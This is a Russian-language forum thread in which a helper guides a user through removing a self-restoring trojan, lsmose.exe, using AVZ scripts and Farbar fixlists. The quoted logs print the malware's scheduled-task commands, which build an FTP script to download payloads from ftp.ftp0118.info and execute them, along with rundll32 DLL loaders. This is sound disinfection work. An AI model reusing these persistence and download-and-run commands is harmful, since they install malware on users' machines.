Троян lsmose.exe нагружающий процессор

[evilmolen]

Приветствую!
После установки новой системы каким-то боком умудрился поймать троян.
Пока нашел его только тут:
c:\Windows\debug\lsmose.exe
c:\Windows\help\lsmose.exe
Mysa 1(C:\Windows\System32\Tasks\Mysa1)
Mysa 2(C:\Windows\System32\Tasks\Mysa2)
Mysa 3(C:\Windows\System32\Tasks\Mysa3)
ok(C:\Windows\System32\Tasks\ok)

Удаление файлов ничего не даёт, автозагрузку чистил, весь мусор удалял, но он каким-то образом восстанавливает сам себя.
Надеюсь на вашу помощь!
 

CollectionLog-2018.03.20-21.53.zip

[thyrex]

Выполните скрипт в AVZ

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 DeleteService('mssecsvc2.0');
 TerminateProcessByName('C:\Windows\debug\lsmose.exe');
 QuarantineFile('C:\Windows\debug\lsmose.exe','');
 TerminateProcessByName('c:\windows\syswow64\lsmos.exe');
 QuarantineFile('c:\windows\syswow64\lsmos.exe','');
 DeleteFile('c:\windows\syswow64\lsmos.exe','32');
 DeleteFile('C:\Windows\debug\lsmose.exe','32');
 DeleteFile('C:\WINDOWS\mssecsvc.exe','32');
 DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('C:\Windows\system32\Tasks\ok','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.

[evilmolen]

Спасибо, что помогаете! В своё время на соседнем форуме на такие жалобы стали просто забивать =\

Ответ бота о получении архива карантина - KLAN-7794046976
Гуглопочта никак не хочет архив с вирусом пропускать, только загрузив на ГДиск смог отправить.
email:

Thank you for contacting Kaspersky Lab

The specified URLs have been scanned with the Kaspersky Security Network cloud service.

Our antivirus databases do not contain the specified URLs:
https://drive.google.com/file/d/1ZfIdjTMb5qx0QFZ36Rxm819ATnXZmOP9/view?usp=drive_web

We will thoroughly analyze URLs you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.

This is an automatically generated message. Please do not reply to it.

Anti-Virus Lab, Kaspersky Lab HQ

"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700

Обнаружил файл трояна в папке "C:\Windows\Help", просто удалил предварительно сохранив в архив, если он вам понадобится.
Посмотрим что будет дальше.

CollectionLog-2018.03.21-00.56.zip

Изменено 20 марта, 2018 пользователем evilmolen

[thyrex]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

[evilmolen]

Добрый день!
Архив с двумя файлами прикрепил.

FRST64.rar

[evilmolen]

Не могу отредактировать сообщение, извиняюсь за даблпост.
Троян снова живёт в системе, опять наделал тех же файлов что и в прошлый раз, опять грузит процессор.

[thyrex]

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Task: {14AF3EA3-9A38-45DF-B6BC-386BC6D4D1D4} - \Mysa3 -> No File <==== ATTENTION
Task: {E0AD7587-2863-4D18-8ED7-79B891161342} - \ok -> No File <==== ATTENTION
Task: {E1E0715D-2ED7-4C5A-8359-8CD9CAFE1A45} - \Mysa1 -> No File <==== ATTENTION
Task: {ECA3BC3F-4036-47A3-B6F6-3E71796C3339} - \Mysa2 -> No File <==== ATTENTION
Task: {F0BFAF96-3862-497C-A12B-AAE9A61D0640} - \Mysa -> No File <==== ATTENTION
Reboot:

2. Нажмите Файл – Сохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файла – Все файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

[evilmolen]

Готово

Fixlog.txt

[thyrex]

Удалите файл Addition.txt и сделайте новые логи Farbar

[evilmolen]

Весь день ждал, пока троян запустится, т.к. вчера он опять проявился, но сегодня он молчит почему-то.
В соседней теме я видел что советовали не убивать процессы трояна, а именно при его активности вести сбор логов, это верное утверждение?
 

FRST64.rar

[thyrex]

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
2018-03-21 12:34 - 2018-03-21 23:54 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-03-21 12:34 - 2018-03-21 23:54 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-03-21 12:34 - 2018-03-21 23:54 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-03-21 12:34 - 2018-03-21 23:54 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-03-21 12:34 - 2018-03-21 12:34 - 002696192 _____ C:\Windows\SysWOW64\lsmos.exe
Task: {D939863D-B1DF-496F-9694-E260D163B99C} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {4C82D806-B518-4BAE-A410-FFA6ADF0119A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {59EDC14C-60C2-451E-8F88-21C9D44654CC} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {667FFF52-1F86-4CBB-8343-F10384B5FBF3} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
c:\windows\debug\ok.dat
c:\windows\debug\item.dat
Reboot:

2. Нажмите Файл – Сохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файла – Все файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

[evilmolen]

Видимо я что-то не так делаю, опять ошибки "could not remove. Access Denied".
У меня контроль учётных записей пользователей UAC отключен, по идее у единственного пользователя права администратора есть.

Fixlog.txt

[thyrex]

Сделайте лог МВАМ

[evilmolen]

Готово
 

MalwarebytesLOG.txt

Изменено 22 марта, 2018 пользователем evilmolen

[thyrex]

Удалите в МВАМ все, кроме

PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Проигнорировано пользователем, [661], [393793],1.0.4450